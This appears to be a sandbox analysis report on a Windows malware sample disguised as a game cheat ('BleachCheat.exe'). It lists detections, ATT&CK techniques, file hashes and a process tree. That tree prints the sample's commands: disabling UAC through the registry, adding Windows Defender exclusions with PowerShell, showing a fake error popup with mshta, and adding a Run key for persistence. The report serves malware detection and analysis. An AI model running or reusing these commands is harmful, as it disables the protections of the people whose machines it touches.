937057dcc1b0772f7169bc46761b73ab2058efd53d9854877370071b9431a447

Analysis

max time kernel
146s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
16-04-2024 00:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BleachCheat.exe
Size

7.5MB
MD5

4a8752fcb5b8c322f5387dc92b05cc2f
SHA1

e8c33f6e69aa5bf323801c678bebf4d8af00a474
SHA256

937057dcc1b0772f7169bc46761b73ab2058efd53d9854877370071b9431a447
SHA512

153c2d43b2160d6d601722df3c7ea286eb4f8c836bb77653098f3b5096d92cc7bf8f1637eba25385a5c300e5849d6ca384aba1280acbf490ddd377a595b2572c
SSDEEP

196608:ddgUfWEkm/wQKES+cjTDTqhLkADK4Wi8nqNk:PIQDS+CTSGU4rqNk

Score

10^/10

agilenet evasion persistence themida trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/3368-120-0x000000001BBC0000-0x000000001BBCE000-memory.dmp	disable_win_def

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	svchost.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	svchost.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	BleachCheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	svchost.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe

Executes dropped EXE 1 IoCs

pid	Process
3368	svchost.exe

Loads dropped DLL 1 IoCs

pid	Process
3368	svchost.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/files/0x001d00000001e97e-8.dat	agile_net
behavioral1/memory/3368-16-0x00000000003D0000-0x0000000000AD6000-memory.dmp	agile_net

Themida packer 16 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0007000000023434-26.dat	themida
behavioral1/memory/3368-28-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-33-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-103-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-104-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-106-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-108-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-109-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-111-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-112-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-114-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-115-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-116-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-117-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-118-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida
behavioral1/memory/3368-119-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	svchost.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3368	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2360	powershell.exe
2360	powershell.exe
1544	powershell.exe
1544	powershell.exe
1544	powershell.exe
3828	powershell.exe
3828	powershell.exe
3828	powershell.exe
3288	powershell.exe
3288	powershell.exe
3288	powershell.exe
3368	svchost.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	3368	svchost.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeDebugPrivilege	3828	powershell.exe
Token: SeDebugPrivilege	3288	powershell.exe
Token: SeShutdownPrivilege	3368	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3368	svchost.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 2096 wrote to memory of 4064	2096	BleachCheat.exe	87
PID 2096 wrote to memory of 4064	2096	BleachCheat.exe	87
PID 2096 wrote to memory of 3368	2096	BleachCheat.exe	90
PID 2096 wrote to memory of 3368	2096	BleachCheat.exe	90
PID 4064 wrote to memory of 4636	4064	cmd.exe	91
PID 4064 wrote to memory of 4636	4064	cmd.exe	91
PID 4064 wrote to memory of 3220	4064	cmd.exe	92
PID 4064 wrote to memory of 3220	4064	cmd.exe	92
PID 4064 wrote to memory of 4216	4064	cmd.exe	93
PID 4064 wrote to memory of 4216	4064	cmd.exe	93
PID 4064 wrote to memory of 3096	4064	cmd.exe	95
PID 4064 wrote to memory of 3096	4064	cmd.exe	95
PID 4064 wrote to memory of 3580	4064	cmd.exe	96
PID 4064 wrote to memory of 3580	4064	cmd.exe	96
PID 4064 wrote to memory of 4556	4064	cmd.exe	97
PID 4064 wrote to memory of 4556	4064	cmd.exe	97
PID 4064 wrote to memory of 852	4064	cmd.exe	98
PID 4064 wrote to memory of 852	4064	cmd.exe	98
PID 4064 wrote to memory of 1536	4064	cmd.exe	99
PID 4064 wrote to memory of 1536	4064	cmd.exe	99
PID 4064 wrote to memory of 1220	4064	cmd.exe	100
PID 4064 wrote to memory of 1220	4064	cmd.exe	100
PID 4064 wrote to memory of 3812	4064	cmd.exe	101
PID 4064 wrote to memory of 3812	4064	cmd.exe	101
PID 4064 wrote to memory of 2704	4064	cmd.exe	102
PID 4064 wrote to memory of 2704	4064	cmd.exe	102
PID 3812 wrote to memory of 756	3812	cmd.exe	105
PID 3812 wrote to memory of 756	3812	cmd.exe	105
PID 2704 wrote to memory of 2180	2704	cmd.exe	106
PID 2704 wrote to memory of 2180	2704	cmd.exe	106
PID 3368 wrote to memory of 2360	3368	svchost.exe	111
PID 3368 wrote to memory of 2360	3368	svchost.exe	111
PID 3368 wrote to memory of 1544	3368	svchost.exe	113
PID 3368 wrote to memory of 1544	3368	svchost.exe	113
PID 3368 wrote to memory of 3828	3368	svchost.exe	115
PID 3368 wrote to memory of 3828	3368	svchost.exe	115
PID 3368 wrote to memory of 3288	3368	svchost.exe	117
PID 3368 wrote to memory of 3288	3368	svchost.exe	117

C:\Users\Admin\AppData\Local\Temp\BleachCheat.exe
"C:\Users\Admin\AppData\Local\Temp\BleachCheat.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\z.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4064
- - C:\Windows\system32\chcp.com
    chcp.com 437
    3⤵
    PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c type tmp
    3⤵
    PID:3220
- - C:\Windows\system32\find.exe
    find
    3⤵
    PID:4216
- - C:\Windows\system32\find.exe
    find
    3⤵
    PID:3096
- - C:\Windows\system32\findstr.exe
    findstr /L /I set "C:\ProgramData\z.bat"
    3⤵
    PID:3580
- - C:\Windows\system32\findstr.exe
    findstr /L /I goto "C:\ProgramData\z.bat"
    3⤵
    PID:4556
- - C:\Windows\system32\findstr.exe
    findstr /L /I echo "C:\ProgramData\z.bat"
    3⤵
    PID:852
- - C:\Windows\system32\findstr.exe
    findstr /L /I pause "C:\ProgramData\z.bat"
    3⤵
    PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c type tmp
    3⤵
    PID:1220
- - C:\Windows\system32\cmd.exe
    cmd.exe /c mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The instruction at 0x00000000771034FB referenced memory at 0x00000000771034FB. The required data was not placed into memory because of an I/O error status of 0x0000428. Click on OK to terminate the program', 0, 'Application Error', 0+16);close()"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3812
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The instruction at 0x00000000771034FB referenced memory at 0x00000000771034FB. The required data was not placed into memory because of an I/O error status of 0x0000428. Click on OK to terminate the program', 0, 'Application Error', 0+16);close()"
      4⤵
      PID:756
- - C:\Windows\system32\cmd.exe
    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2704
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:2180
- C:\ProgramData\svchost.exe
  "C:\ProgramData\svchost.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3828
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\svchost.exe

Filesize
7.0MB

MD5
360641f7b6c03acf49f6a27998534a97

SHA1
b884af4d3f2dbe0d5cc298df523522c4c9477668

SHA256
eaf9b8f2a3e9ade18c0313191358254b7cb06a15baf6258666b841fa24120b98

SHA512
acfb43cc566f90d0187849ed4c35fd57171d9f3b957a7e348383d8afe995a89ea4ef094ddb32f75bae4c50782a090c2a4b8e972f7336c120215b4a23fba679cc

Download Submit
C:\ProgramData\tmp

Filesize
14B

MD5
ce585c6ba32ac17652d2345118536f9c

SHA1
be0e41b3690c42e4c0cdb53d53fc544fb46b758d

SHA256
589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

SHA512
d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

Download Submit
C:\ProgramData\z.bat

Filesize
20KB

MD5
77946ef866ba3e46fb161bc52214c616

SHA1
20a53a00be7f4c76e3a1b02eb82675f7b8e77a0c

SHA256
0562794443d5322e9271dbdce3af9b3ba5e14e831077796552f0d507e836c48f

SHA512
b5671ee7de190613ff6095b564283c5b689008c79eab91ab39d95241dfed797ca61ee196bebbac4d481e5c0e4330bc6de40d7486f4d7eb8e0fcb01a734e1cbdb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0de7973d81e8726da4f2de4dd399dbad

SHA1
de59047d06801a64300c7cef0ec5caa29979a3cd

SHA256
34afedd1d1e38b0ffe8a6beb95a6b78ce092c9b77ad3fc80b00e5497a18c3c22

SHA512
93180ab88201598a31bbb12d344a9f87cfab82edc377d8bef54f2d72b6194936f35a71cbac33145360aaf34951efa7a8e3fb9b4d33af6c7c68d63ab25e08fe69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Temp\700c14c7-4c15-455b-ae60-c9420a3e81fc\AgileDotNetRT64.dll

Filesize
4.2MB

MD5
05b012457488a95a05d0541e0470d392

SHA1
74f541d6a8365508c794ef7b4ac7c297457f9ce3

SHA256
1f77a0749ac730500f203b8c4d072587923ac679e184a3859aeb855c2a2e7d8d

SHA512
6d6e7b838d4425d49ac8d3738135374ef5357f0677b07cecb7afbf5feddc1997bf6dce68d48787eff8a74c4728def8880c8f01842eda35b5815fb561fa401ae6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_erxlkq5k.mam.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1544-67-0x00007FFA4E440000-0x00007FFA4EF01000-memory.dmp

Filesize
10.8MB

Download
memory/1544-58-0x00007FFA4E440000-0x00007FFA4EF01000-memory.dmp

Filesize
10.8MB

Download
memory/1544-60-0x000001BE63750000-0x000001BE63760000-memory.dmp

Filesize
64KB

Download
memory/1544-65-0x000001BE63750000-0x000001BE63760000-memory.dmp

Filesize
64KB

Download
memory/2360-46-0x00007FFA4E440000-0x00007FFA4EF01000-memory.dmp

Filesize
10.8MB

Download
memory/2360-51-0x00007FFA4E440000-0x00007FFA4EF01000-memory.dmp

Filesize
10.8MB

Download
memory/2360-47-0x000001CD3C6B0000-0x000001CD3C6C0000-memory.dmp

Filesize
64KB

Download
memory/2360-45-0x000001CD3C860000-0x000001CD3C882000-memory.dmp

Filesize
136KB

Download
memory/2360-48-0x000001CD3C6B0000-0x000001CD3C6C0000-memory.dmp

Filesize
64KB

Download
memory/3288-82-0x00007FFA4E440000-0x00007FFA4EF01000-memory.dmp

Filesize
10.8MB

Download
memory/3288-98-0x00007FFA4E440000-0x00007FFA4EF01000-memory.dmp

Filesize
10.8MB

Download
memory/3288-96-0x0000012638E10000-0x0000012638E20000-memory.dmp

Filesize
64KB

Download
memory/3288-84-0x0000012638E10000-0x0000012638E20000-memory.dmp

Filesize
64KB

Download
memory/3288-83-0x0000012638E10000-0x0000012638E20000-memory.dmp

Filesize
64KB

Download
memory/3368-109-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-106-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-120-0x000000001BBC0000-0x000000001BBCE000-memory.dmp

Filesize
56KB

Download
memory/3368-119-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-118-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-28-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-16-0x00000000003D0000-0x0000000000AD6000-memory.dmp

Filesize
7.0MB

Download
memory/3368-95-0x00007FFA4E440000-0x00007FFA4EF01000-memory.dmp

Filesize
10.8MB

Download
memory/3368-29-0x00007FFA6CA70000-0x00007FFA6CC65000-memory.dmp

Filesize
2.0MB

Download
memory/3368-33-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-103-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-104-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-105-0x00007FFA6CA70000-0x00007FFA6CC65000-memory.dmp

Filesize
2.0MB

Download
memory/3368-17-0x00007FFA4E440000-0x00007FFA4EF01000-memory.dmp

Filesize
10.8MB

Download
memory/3368-108-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-35-0x00007FFA5DDB0000-0x00007FFA5DEFE000-memory.dmp

Filesize
1.3MB

Download
memory/3368-111-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-112-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-114-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-115-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-116-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3368-117-0x00007FFA49B00000-0x00007FFA4A684000-memory.dmp

Filesize
11.5MB

Download
memory/3828-68-0x00007FFA4E440000-0x00007FFA4EF01000-memory.dmp

Filesize
10.8MB

Download
memory/3828-74-0x000001F4F8190000-0x000001F4F81A0000-memory.dmp

Filesize
64KB

Download
memory/3828-81-0x00007FFA4E440000-0x00007FFA4EF01000-memory.dmp

Filesize
10.8MB

Download